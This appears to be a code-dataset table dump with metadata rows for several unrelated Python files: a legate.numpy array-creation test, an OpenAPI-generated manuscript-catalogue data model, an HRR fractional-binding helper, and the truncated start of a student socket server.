| hexsha (string, 40) | size (int64, 5-2.06M) | ext (string, 10 classes) | lang (string, 1 class) | max_stars_repo_path (string, 3-248) | max_stars_repo_name (string, 5-125) | max_stars_repo_head_hexsha (string, 40-78) | max_stars_repo_licenses (list, 1-10) | max_stars_count (int64, 1-191k, nullable) | max_stars_repo_stars_event_min_datetime (string, 24, nullable) | max_stars_repo_stars_event_max_datetime (string, 24, nullable) | max_issues_repo_path (string, 3-248) | max_issues_repo_name (string, 5-125) | max_issues_repo_head_hexsha (string, 40-78) | max_issues_repo_licenses (list, 1-10) | max_issues_count (int64, 1-67k, nullable) | max_issues_repo_issues_event_min_datetime (string, 24, nullable) | max_issues_repo_issues_event_max_datetime (string, 24, nullable) | max_forks_repo_path (string, 3-248) | max_forks_repo_name (string, 5-125) | max_forks_repo_head_hexsha (string, 40-78) | max_forks_repo_licenses (list, 1-10) | max_forks_count (int64, 1-105k, nullable) | max_forks_repo_forks_event_min_datetime (string, 24, nullable) | max_forks_repo_forks_event_max_datetime (string, 24, nullable) | content (string, 5-2.06M) | avg_line_length (float64, 1-1.02M) | max_line_length (int64, 3-1.03M) | alphanum_fraction (float64, 0-1) | count_classes (int64, 0-1.6M) | score_classes (float64, 0-1) | count_generators (int64, 0-651k) | score_generators (float64, 0-1) | count_decorators (int64, 0-990k) | score_decorators (float64, 0-1) | count_async_functions (int64, 0-235k) | score_async_functions (float64, 0-1) | count_documentation (int64, 0-1.04M) | score_documentation (float64, 0-1) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 8b8fdfbcf9706a09172ee59fba63e07828a65599 | 2,492 | py | Python | tests/array_creation.py | manopapad/legate.numpy | 896f4fd9b32db445da6cdabf7b78d523fca96936 | ["Apache-2.0"] | null | null | null | tests/array_creation.py | manopapad/legate.numpy | 896f4fd9b32db445da6cdabf7b78d523fca96936 | ["Apache-2.0"] | null | null | null | tests/array_creation.py | manopapad/legate.numpy | 896f4fd9b32db445da6cdabf7b78d523fca96936 | ["Apache-2.0"] | null | null | null |
# Copyright 2021 NVIDIA Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

import numpy as np

import legate.numpy as lg


def test():
    # array() should accept both Python sequences and existing ndarrays
    x = lg.array([1, 2, 3])
    y = np.array([1, 2, 3])
    z = lg.array(y)
    assert np.array_equal(x, z)
    assert x.dtype == z.dtype

    # empty() only guarantees shape and dtype, not contents
    xe = lg.empty((2, 3))
    ye = np.empty((2, 3))
    assert lg.shape(xe) == np.shape(ye)
    assert xe.dtype == ye.dtype

    xz = lg.zeros((2, 3))
    yz = np.zeros((2, 3))
    assert np.array_equal(xz, yz)
    assert xz.dtype == yz.dtype

    xo = lg.ones((2, 3))
    yo = np.ones((2, 3))
    assert np.array_equal(xo, yo)
    assert xo.dtype == yo.dtype

    xf = lg.full((2, 3), 3)
    yf = np.full((2, 3), 3)
    assert np.array_equal(xf, yf)
    assert xf.dtype == yf.dtype

    # *_like() variants should mirror the prototype array
    xel = lg.empty_like(x)
    yel = np.empty_like(y)
    assert lg.shape(xel) == np.shape(yel)
    assert xel.dtype == yel.dtype

    xzl = lg.zeros_like(x)
    yzl = np.zeros_like(y)
    assert np.array_equal(xzl, yzl)
    assert xzl.dtype == yzl.dtype

    xol = lg.ones_like(x)
    yol = np.ones_like(y)
    assert np.array_equal(xol, yol)
    assert xol.dtype == yol.dtype

    xfl = lg.full_like(x, 3)
    yfl = np.full_like(y, 3)
    assert np.array_equal(xfl, yfl)
    assert xfl.dtype == yfl.dtype

    # arange() with various start/stop/step/dtype combinations
    x = lg.arange(10)
    y = np.arange(10)
    assert np.array_equal(x, y)
    assert x.dtype == y.dtype

    x = lg.arange(10, dtype=np.int32)
    y = np.arange(10, dtype=np.int32)
    assert np.array_equal(x, y)
    assert x.dtype == y.dtype

    x = lg.arange(2.0, 10.0)
    y = np.arange(2.0, 10.0)
    assert np.array_equal(x, y)
    assert x.dtype == y.dtype

    x = lg.arange(2, 30, 3)
    y = np.arange(2, 30, 3)
    assert np.array_equal(x, y)
    assert x.dtype == y.dtype

    # xfls = lg.full_like(x, '3', dtype=np.str_)
    # yfls = np.full_like(y, '3', dtype=np.str_)
    # assert(lg.array_equal(xfls, yfls))
    # assert(xfls.dtype == yfls.dtype)
    return


if __name__ == "__main__":
    test()
| 25.428571 | 74 | 0.620385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 738 | 0.296148 |
| 8b90aeb5aec1b01857b6aa8b3d9934d4cfdd1543 | 29,250 | py | Python | libs/python/qumranica/models/catalogue_match_dto.py | Scripta-Qumranica-Electronica/SQE_API_Connectors | aaa9b9eb8709d4257c32ea57321a179c6b1e041a | ["MIT"] | null | null | null | libs/python/qumranica/models/catalogue_match_dto.py | Scripta-Qumranica-Electronica/SQE_API_Connectors | aaa9b9eb8709d4257c32ea57321a179c6b1e041a | ["MIT"] | null | null | null | libs/python/qumranica/models/catalogue_match_dto.py | Scripta-Qumranica-Electronica/SQE_API_Connectors | aaa9b9eb8709d4257c32ea57321a179c6b1e041a | ["MIT"] | null | null | null |
# coding: utf-8
"""
SQE API
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: v1
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from qumranica.configuration import Configuration
class CatalogueMatchDTO(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'image_catalog_id': 'int',
'institution': 'str',
'catalogue_number1': 'str',
'catalogue_number2': 'str',
'proxy': 'str',
'url': 'str',
'filename': 'str',
'suffix': 'str',
'thumbnail': 'str',
'license': 'str',
'iaa_edition_catalogue_id': 'int',
'manuscript_name': 'str',
'name': 'str',
'match_author': 'str',
'match_confirmation_author': 'str',
'match_id': 'int',
'date_of_match': 'datetime',
'date_of_confirmation': 'datetime',
'catalog_side': 'SideDesignation',
'imaged_object_id': 'str',
'manuscript_id': 'int',
'edition_name': 'str',
'edition_volume': 'str',
'edition_location1': 'str',
'edition_location2': 'str',
'edition_side': 'SideDesignation',
'comment': 'str',
'text_fragment_id': 'int',
'edition_id': 'int',
'confirmed': 'bool'
}
attribute_map = {
'image_catalog_id': 'imageCatalogId',
'institution': 'institution',
'catalogue_number1': 'catalogueNumber1',
'catalogue_number2': 'catalogueNumber2',
'proxy': 'proxy',
'url': 'url',
'filename': 'filename',
'suffix': 'suffix',
'thumbnail': 'thumbnail',
'license': 'license',
'iaa_edition_catalogue_id': 'iaaEditionCatalogueId',
'manuscript_name': 'manuscriptName',
'name': 'name',
'match_author': 'matchAuthor',
'match_confirmation_author': 'matchConfirmationAuthor',
'match_id': 'matchId',
'date_of_match': 'dateOfMatch',
'date_of_confirmation': 'dateOfConfirmation',
'catalog_side': 'catalogSide',
'imaged_object_id': 'imagedObjectId',
'manuscript_id': 'manuscriptId',
'edition_name': 'editionName',
'edition_volume': 'editionVolume',
'edition_location1': 'editionLocation1',
'edition_location2': 'editionLocation2',
'edition_side': 'editionSide',
'comment': 'comment',
'text_fragment_id': 'textFragmentId',
'edition_id': 'editionId',
'confirmed': 'confirmed'
}
def __init__(self, image_catalog_id=None, institution=None, catalogue_number1=None, catalogue_number2=None, proxy=None, url=None, filename=None, suffix=None, thumbnail=None, license=None, iaa_edition_catalogue_id=None, manuscript_name=None, name=None, match_author=None, match_confirmation_author=None, match_id=None, date_of_match=None, date_of_confirmation=None, catalog_side=None, imaged_object_id=None, manuscript_id=None, edition_name=None, edition_volume=None, edition_location1=None, edition_location2=None, edition_side=None, comment=None, text_fragment_id=None, edition_id=None, confirmed=None, local_vars_configuration=None): # noqa: E501
"""CatalogueMatchDTO - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._image_catalog_id = None
self._institution = None
self._catalogue_number1 = None
self._catalogue_number2 = None
self._proxy = None
self._url = None
self._filename = None
self._suffix = None
self._thumbnail = None
self._license = None
self._iaa_edition_catalogue_id = None
self._manuscript_name = None
self._name = None
self._match_author = None
self._match_confirmation_author = None
self._match_id = None
self._date_of_match = None
self._date_of_confirmation = None
self._catalog_side = None
self._imaged_object_id = None
self._manuscript_id = None
self._edition_name = None
self._edition_volume = None
self._edition_location1 = None
self._edition_location2 = None
self._edition_side = None
self._comment = None
self._text_fragment_id = None
self._edition_id = None
self._confirmed = None
self.discriminator = None
self.image_catalog_id = image_catalog_id
self.institution = institution
self.catalogue_number1 = catalogue_number1
self.catalogue_number2 = catalogue_number2
self.proxy = proxy
self.url = url
self.filename = filename
self.suffix = suffix
self.thumbnail = thumbnail
self.license = license
self.iaa_edition_catalogue_id = iaa_edition_catalogue_id
self.manuscript_name = manuscript_name
self.name = name
self.match_author = match_author
self.match_confirmation_author = match_confirmation_author
self.match_id = match_id
self.date_of_match = date_of_match
self.date_of_confirmation = date_of_confirmation
if catalog_side is not None:
self.catalog_side = catalog_side
self.imaged_object_id = imaged_object_id
self.manuscript_id = manuscript_id
self.edition_name = edition_name
self.edition_volume = edition_volume
self.edition_location1 = edition_location1
self.edition_location2 = edition_location2
self.edition_side = edition_side
self.comment = comment
self.text_fragment_id = text_fragment_id
self.edition_id = edition_id
self.confirmed = confirmed
@property
def image_catalog_id(self):
"""Gets the image_catalog_id of this CatalogueMatchDTO. # noqa: E501
:return: The image_catalog_id of this CatalogueMatchDTO. # noqa: E501
:rtype: int
"""
return self._image_catalog_id
@image_catalog_id.setter
def image_catalog_id(self, image_catalog_id):
"""Sets the image_catalog_id of this CatalogueMatchDTO.
:param image_catalog_id: The image_catalog_id of this CatalogueMatchDTO. # noqa: E501
:type: int
"""
if self.local_vars_configuration.client_side_validation and image_catalog_id is None: # noqa: E501
raise ValueError("Invalid value for `image_catalog_id`, must not be `None`") # noqa: E501
self._image_catalog_id = image_catalog_id
@property
def institution(self):
"""Gets the institution of this CatalogueMatchDTO. # noqa: E501
:return: The institution of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._institution
@institution.setter
def institution(self, institution):
"""Sets the institution of this CatalogueMatchDTO.
:param institution: The institution of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and institution is None: # noqa: E501
raise ValueError("Invalid value for `institution`, must not be `None`") # noqa: E501
self._institution = institution
@property
def catalogue_number1(self):
"""Gets the catalogue_number1 of this CatalogueMatchDTO. # noqa: E501
:return: The catalogue_number1 of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._catalogue_number1
@catalogue_number1.setter
def catalogue_number1(self, catalogue_number1):
"""Sets the catalogue_number1 of this CatalogueMatchDTO.
:param catalogue_number1: The catalogue_number1 of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and catalogue_number1 is None: # noqa: E501
raise ValueError("Invalid value for `catalogue_number1`, must not be `None`") # noqa: E501
self._catalogue_number1 = catalogue_number1
@property
def catalogue_number2(self):
"""Gets the catalogue_number2 of this CatalogueMatchDTO. # noqa: E501
:return: The catalogue_number2 of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._catalogue_number2
@catalogue_number2.setter
def catalogue_number2(self, catalogue_number2):
"""Sets the catalogue_number2 of this CatalogueMatchDTO.
:param catalogue_number2: The catalogue_number2 of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
self._catalogue_number2 = catalogue_number2
@property
def proxy(self):
"""Gets the proxy of this CatalogueMatchDTO. # noqa: E501
:return: The proxy of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._proxy
@proxy.setter
def proxy(self, proxy):
"""Sets the proxy of this CatalogueMatchDTO.
:param proxy: The proxy of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
self._proxy = proxy
@property
def url(self):
"""Gets the url of this CatalogueMatchDTO. # noqa: E501
:return: The url of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._url
@url.setter
def url(self, url):
"""Sets the url of this CatalogueMatchDTO.
:param url: The url of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and url is None: # noqa: E501
raise ValueError("Invalid value for `url`, must not be `None`") # noqa: E501
self._url = url
@property
def filename(self):
"""Gets the filename of this CatalogueMatchDTO. # noqa: E501
:return: The filename of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._filename
@filename.setter
def filename(self, filename):
"""Sets the filename of this CatalogueMatchDTO.
:param filename: The filename of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and filename is None: # noqa: E501
raise ValueError("Invalid value for `filename`, must not be `None`") # noqa: E501
self._filename = filename
@property
def suffix(self):
"""Gets the suffix of this CatalogueMatchDTO. # noqa: E501
:return: The suffix of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._suffix
@suffix.setter
def suffix(self, suffix):
"""Sets the suffix of this CatalogueMatchDTO.
:param suffix: The suffix of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and suffix is None: # noqa: E501
raise ValueError("Invalid value for `suffix`, must not be `None`") # noqa: E501
self._suffix = suffix
@property
def thumbnail(self):
"""Gets the thumbnail of this CatalogueMatchDTO. # noqa: E501
:return: The thumbnail of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._thumbnail
@thumbnail.setter
def thumbnail(self, thumbnail):
"""Sets the thumbnail of this CatalogueMatchDTO.
:param thumbnail: The thumbnail of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and thumbnail is None: # noqa: E501
raise ValueError("Invalid value for `thumbnail`, must not be `None`") # noqa: E501
self._thumbnail = thumbnail
@property
def license(self):
"""Gets the license of this CatalogueMatchDTO. # noqa: E501
:return: The license of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._license
@license.setter
def license(self, license):
"""Sets the license of this CatalogueMatchDTO.
:param license: The license of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and license is None: # noqa: E501
raise ValueError("Invalid value for `license`, must not be `None`") # noqa: E501
self._license = license
@property
def iaa_edition_catalogue_id(self):
"""Gets the iaa_edition_catalogue_id of this CatalogueMatchDTO. # noqa: E501
:return: The iaa_edition_catalogue_id of this CatalogueMatchDTO. # noqa: E501
:rtype: int
"""
return self._iaa_edition_catalogue_id
@iaa_edition_catalogue_id.setter
def iaa_edition_catalogue_id(self, iaa_edition_catalogue_id):
"""Sets the iaa_edition_catalogue_id of this CatalogueMatchDTO.
:param iaa_edition_catalogue_id: The iaa_edition_catalogue_id of this CatalogueMatchDTO. # noqa: E501
:type: int
"""
if self.local_vars_configuration.client_side_validation and iaa_edition_catalogue_id is None: # noqa: E501
raise ValueError("Invalid value for `iaa_edition_catalogue_id`, must not be `None`") # noqa: E501
self._iaa_edition_catalogue_id = iaa_edition_catalogue_id
@property
def manuscript_name(self):
"""Gets the manuscript_name of this CatalogueMatchDTO. # noqa: E501
:return: The manuscript_name of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._manuscript_name
@manuscript_name.setter
def manuscript_name(self, manuscript_name):
"""Sets the manuscript_name of this CatalogueMatchDTO.
:param manuscript_name: The manuscript_name of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and manuscript_name is None: # noqa: E501
raise ValueError("Invalid value for `manuscript_name`, must not be `None`") # noqa: E501
self._manuscript_name = manuscript_name
@property
def name(self):
"""Gets the name of this CatalogueMatchDTO. # noqa: E501
:return: The name of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this CatalogueMatchDTO.
:param name: The name of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and name is None: # noqa: E501
raise ValueError("Invalid value for `name`, must not be `None`") # noqa: E501
self._name = name
@property
def match_author(self):
"""Gets the match_author of this CatalogueMatchDTO. # noqa: E501
:return: The match_author of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._match_author
@match_author.setter
def match_author(self, match_author):
"""Sets the match_author of this CatalogueMatchDTO.
:param match_author: The match_author of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and match_author is None: # noqa: E501
raise ValueError("Invalid value for `match_author`, must not be `None`") # noqa: E501
self._match_author = match_author
@property
def match_confirmation_author(self):
"""Gets the match_confirmation_author of this CatalogueMatchDTO. # noqa: E501
:return: The match_confirmation_author of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._match_confirmation_author
@match_confirmation_author.setter
def match_confirmation_author(self, match_confirmation_author):
"""Sets the match_confirmation_author of this CatalogueMatchDTO.
:param match_confirmation_author: The match_confirmation_author of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
self._match_confirmation_author = match_confirmation_author
@property
def match_id(self):
"""Gets the match_id of this CatalogueMatchDTO. # noqa: E501
:return: The match_id of this CatalogueMatchDTO. # noqa: E501
:rtype: int
"""
return self._match_id
@match_id.setter
def match_id(self, match_id):
"""Sets the match_id of this CatalogueMatchDTO.
:param match_id: The match_id of this CatalogueMatchDTO. # noqa: E501
:type: int
"""
if self.local_vars_configuration.client_side_validation and match_id is None: # noqa: E501
raise ValueError("Invalid value for `match_id`, must not be `None`") # noqa: E501
self._match_id = match_id
@property
def date_of_match(self):
"""Gets the date_of_match of this CatalogueMatchDTO. # noqa: E501
:return: The date_of_match of this CatalogueMatchDTO. # noqa: E501
:rtype: datetime
"""
return self._date_of_match
@date_of_match.setter
def date_of_match(self, date_of_match):
"""Sets the date_of_match of this CatalogueMatchDTO.
:param date_of_match: The date_of_match of this CatalogueMatchDTO. # noqa: E501
:type: datetime
"""
if self.local_vars_configuration.client_side_validation and date_of_match is None: # noqa: E501
raise ValueError("Invalid value for `date_of_match`, must not be `None`") # noqa: E501
self._date_of_match = date_of_match
@property
def date_of_confirmation(self):
"""Gets the date_of_confirmation of this CatalogueMatchDTO. # noqa: E501
:return: The date_of_confirmation of this CatalogueMatchDTO. # noqa: E501
:rtype: datetime
"""
return self._date_of_confirmation
@date_of_confirmation.setter
def date_of_confirmation(self, date_of_confirmation):
"""Sets the date_of_confirmation of this CatalogueMatchDTO.
:param date_of_confirmation: The date_of_confirmation of this CatalogueMatchDTO. # noqa: E501
:type: datetime
"""
self._date_of_confirmation = date_of_confirmation
@property
def catalog_side(self):
"""Gets the catalog_side of this CatalogueMatchDTO. # noqa: E501
:return: The catalog_side of this CatalogueMatchDTO. # noqa: E501
:rtype: SideDesignation
"""
return self._catalog_side
@catalog_side.setter
def catalog_side(self, catalog_side):
"""Sets the catalog_side of this CatalogueMatchDTO.
:param catalog_side: The catalog_side of this CatalogueMatchDTO. # noqa: E501
:type: SideDesignation
"""
self._catalog_side = catalog_side
@property
def imaged_object_id(self):
"""Gets the imaged_object_id of this CatalogueMatchDTO. # noqa: E501
:return: The imaged_object_id of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._imaged_object_id
@imaged_object_id.setter
def imaged_object_id(self, imaged_object_id):
"""Sets the imaged_object_id of this CatalogueMatchDTO.
:param imaged_object_id: The imaged_object_id of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and imaged_object_id is None: # noqa: E501
raise ValueError("Invalid value for `imaged_object_id`, must not be `None`") # noqa: E501
self._imaged_object_id = imaged_object_id
@property
def manuscript_id(self):
"""Gets the manuscript_id of this CatalogueMatchDTO. # noqa: E501
:return: The manuscript_id of this CatalogueMatchDTO. # noqa: E501
:rtype: int
"""
return self._manuscript_id
@manuscript_id.setter
def manuscript_id(self, manuscript_id):
"""Sets the manuscript_id of this CatalogueMatchDTO.
:param manuscript_id: The manuscript_id of this CatalogueMatchDTO. # noqa: E501
:type: int
"""
if self.local_vars_configuration.client_side_validation and manuscript_id is None: # noqa: E501
raise ValueError("Invalid value for `manuscript_id`, must not be `None`") # noqa: E501
self._manuscript_id = manuscript_id
@property
def edition_name(self):
"""Gets the edition_name of this CatalogueMatchDTO. # noqa: E501
:return: The edition_name of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._edition_name
@edition_name.setter
def edition_name(self, edition_name):
"""Sets the edition_name of this CatalogueMatchDTO.
:param edition_name: The edition_name of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and edition_name is None: # noqa: E501
raise ValueError("Invalid value for `edition_name`, must not be `None`") # noqa: E501
self._edition_name = edition_name
@property
def edition_volume(self):
"""Gets the edition_volume of this CatalogueMatchDTO. # noqa: E501
:return: The edition_volume of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._edition_volume
@edition_volume.setter
def edition_volume(self, edition_volume):
"""Sets the edition_volume of this CatalogueMatchDTO.
:param edition_volume: The edition_volume of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and edition_volume is None: # noqa: E501
raise ValueError("Invalid value for `edition_volume`, must not be `None`") # noqa: E501
self._edition_volume = edition_volume
@property
def edition_location1(self):
"""Gets the edition_location1 of this CatalogueMatchDTO. # noqa: E501
:return: The edition_location1 of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._edition_location1
@edition_location1.setter
def edition_location1(self, edition_location1):
"""Sets the edition_location1 of this CatalogueMatchDTO.
:param edition_location1: The edition_location1 of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and edition_location1 is None: # noqa: E501
raise ValueError("Invalid value for `edition_location1`, must not be `None`") # noqa: E501
self._edition_location1 = edition_location1
@property
def edition_location2(self):
"""Gets the edition_location2 of this CatalogueMatchDTO. # noqa: E501
:return: The edition_location2 of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._edition_location2
@edition_location2.setter
def edition_location2(self, edition_location2):
"""Sets the edition_location2 of this CatalogueMatchDTO.
:param edition_location2: The edition_location2 of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and edition_location2 is None: # noqa: E501
raise ValueError("Invalid value for `edition_location2`, must not be `None`") # noqa: E501
self._edition_location2 = edition_location2
@property
def edition_side(self):
"""Gets the edition_side of this CatalogueMatchDTO. # noqa: E501
:return: The edition_side of this CatalogueMatchDTO. # noqa: E501
:rtype: SideDesignation
"""
return self._edition_side
@edition_side.setter
def edition_side(self, edition_side):
"""Sets the edition_side of this CatalogueMatchDTO.
:param edition_side: The edition_side of this CatalogueMatchDTO. # noqa: E501
:type: SideDesignation
"""
if self.local_vars_configuration.client_side_validation and edition_side is None: # noqa: E501
raise ValueError("Invalid value for `edition_side`, must not be `None`") # noqa: E501
self._edition_side = edition_side
@property
def comment(self):
"""Gets the comment of this CatalogueMatchDTO. # noqa: E501
:return: The comment of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._comment
@comment.setter
def comment(self, comment):
"""Sets the comment of this CatalogueMatchDTO.
:param comment: The comment of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
self._comment = comment
@property
def text_fragment_id(self):
"""Gets the text_fragment_id of this CatalogueMatchDTO. # noqa: E501
:return: The text_fragment_id of this CatalogueMatchDTO. # noqa: E501
:rtype: int
"""
return self._text_fragment_id
@text_fragment_id.setter
def text_fragment_id(self, text_fragment_id):
"""Sets the text_fragment_id of this CatalogueMatchDTO.
:param text_fragment_id: The text_fragment_id of this CatalogueMatchDTO. # noqa: E501
:type: int
"""
if self.local_vars_configuration.client_side_validation and text_fragment_id is None: # noqa: E501
raise ValueError("Invalid value for `text_fragment_id`, must not be `None`") # noqa: E501
self._text_fragment_id = text_fragment_id
@property
def edition_id(self):
"""Gets the edition_id of this CatalogueMatchDTO. # noqa: E501
:return: The edition_id of this CatalogueMatchDTO. # noqa: E501
:rtype: int
"""
return self._edition_id
@edition_id.setter
def edition_id(self, edition_id):
"""Sets the edition_id of this CatalogueMatchDTO.
:param edition_id: The edition_id of this CatalogueMatchDTO. # noqa: E501
:type: int
"""
if self.local_vars_configuration.client_side_validation and edition_id is None: # noqa: E501
raise ValueError("Invalid value for `edition_id`, must not be `None`") # noqa: E501
self._edition_id = edition_id
@property
def confirmed(self):
"""Gets the confirmed of this CatalogueMatchDTO. # noqa: E501
:return: The confirmed of this CatalogueMatchDTO. # noqa: E501
:rtype: bool
"""
return self._confirmed
@confirmed.setter
def confirmed(self, confirmed):
"""Sets the confirmed of this CatalogueMatchDTO.
:param confirmed: The confirmed of this CatalogueMatchDTO. # noqa: E501
:type: bool
"""
self._confirmed = confirmed
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, CatalogueMatchDTO):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, CatalogueMatchDTO):
return True
return self.to_dict() != other.to_dict()
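A brief usage sketch for the generated model above; all field values are hypothetical, and only the class's own constructor and `to_dict()` are exercised. Every field whose setter validates against `None` must be supplied:

```python
from qumranica.models.catalogue_match_dto import CatalogueMatchDTO

# Hypothetical values; required fields raise ValueError when left None
# because client_side_validation is on by default.
match = CatalogueMatchDTO(
    image_catalog_id=1, institution="IAA", catalogue_number1="4Q51",
    url="https://example.org/image.jpg", filename="image.jpg",
    suffix=".jpg", thumbnail="thumb.jpg", license="CC-BY",
    iaa_edition_catalogue_id=7, manuscript_name="4QSam-a", name="frg. 1",
    match_author="editor@example.org", match_id=42,
    date_of_match="2020-01-01T00:00:00Z", imaged_object_id="IAA-275-1",
    manuscript_id=3, edition_name="DJD", edition_volume="XVII",
    edition_location1="p. 1", edition_location2="col. i",
    edition_side=0,  # stand-in for a SideDesignation value
    text_fragment_id=11, edition_id=5,
)
print(match.to_dict()["image_catalog_id"])  # -> 1
```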
| 32.79148 | 653 | 0.645675 | 28,887 | 0.98759 | 0 | 0 | 21,097 | 0.721265 | 0 | 0 | 14,751 | 0.504308 |
| 8b914a0a6371ff8952db67b7eee682b5c44c059b | 569 | py | Python | nengo_ssp/hrr_algebra.py | nsdumont/nengo_ssp | 9530a4618e213fb695b52887772c1309d0f07a0b | ["MIT"] | null | null | null | nengo_ssp/hrr_algebra.py | nsdumont/nengo_ssp | 9530a4618e213fb695b52887772c1309d0f07a0b | ["MIT"] | null | null | null | nengo_ssp/hrr_algebra.py | nsdumont/nengo_ssp | 9530a4618e213fb695b52887772c1309d0f07a0b | ["MIT"] | null | null | null |
import numpy as np
from nengo_spa.algebras.hrr_algebra import HrrAlgebra
from nengo.utils.numpy import is_number


# Intentionally shadows the imported nengo_spa HrrAlgebra: the subclass keeps
# the same name while adding fractional binding.
class HrrAlgebra(HrrAlgebra):
    def fractional_bind(self, A, b):
        """Fractional circular convolution."""
        if not is_number(b):
            raise ValueError("b must be a scalar.")
        # Raising the Fourier coefficients to the power b implements
        # fractional binding; b = 1 recovers ordinary circular convolution.
        return np.fft.ifft(np.fft.fft(A, axis=0) ** b, axis=0)

    def bind(self, a, b):
        n = len(a)
        if len(b) != n:
            raise ValueError("Inputs must have same length.")
        return np.fft.ifft(np.fft.fft(a) * np.fft.fft(b), n=n)
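A minimal sketch exercising the algebra above (the random base vector is hypothetical; a real SSP setup would typically use a unitary vector). Binding a vector with itself should match fractional binding with exponent 2:

```python
import numpy as np

alg = HrrAlgebra()
rng = np.random.default_rng(0)
x = rng.normal(size=64) / np.sqrt(64)  # hypothetical base vector

whole = alg.bind(x, x)              # fft(x) * fft(x)
frac = alg.fractional_bind(x, 2.0)  # fft(x) ** 2.0

# Both are complex arrays and should agree up to numerical error.
assert np.allclose(whole, frac)
```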
| 35.5625 | 62 | 0.620387 | 455 | 0.799649 | 0 | 0 | 0 | 0 | 0 | 0 | 90 | 0.158172 |
| 8b9247a613a137d9a893fcd8004929a037e3fffd | 2,234 | py | Python | server.py | Xinzhe-Qi/15112-Term-Project | 07a4b78d23629478039667ed4c29287e5e781bf3 | ["MIT"] | null | null | null | server.py | Xinzhe-Qi/15112-Term-Project | 07a4b78d23629478039667ed4c29287e5e781bf3 | ["MIT"] | null | null | null | server.py | Xinzhe-Qi/15112-Term-Project | 07a4b78d23629478039667ed4c29287e5e781bf3 | ["MIT"] | null | null | null |
import socket
from _thread import start_new_thread
import pickle
from board import Board
import time

hostname = socket.gethostname()
ipAddr = socket.gethostbyname(hostname)
print(ipAddr)

server = ipAddr
port = 5556

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
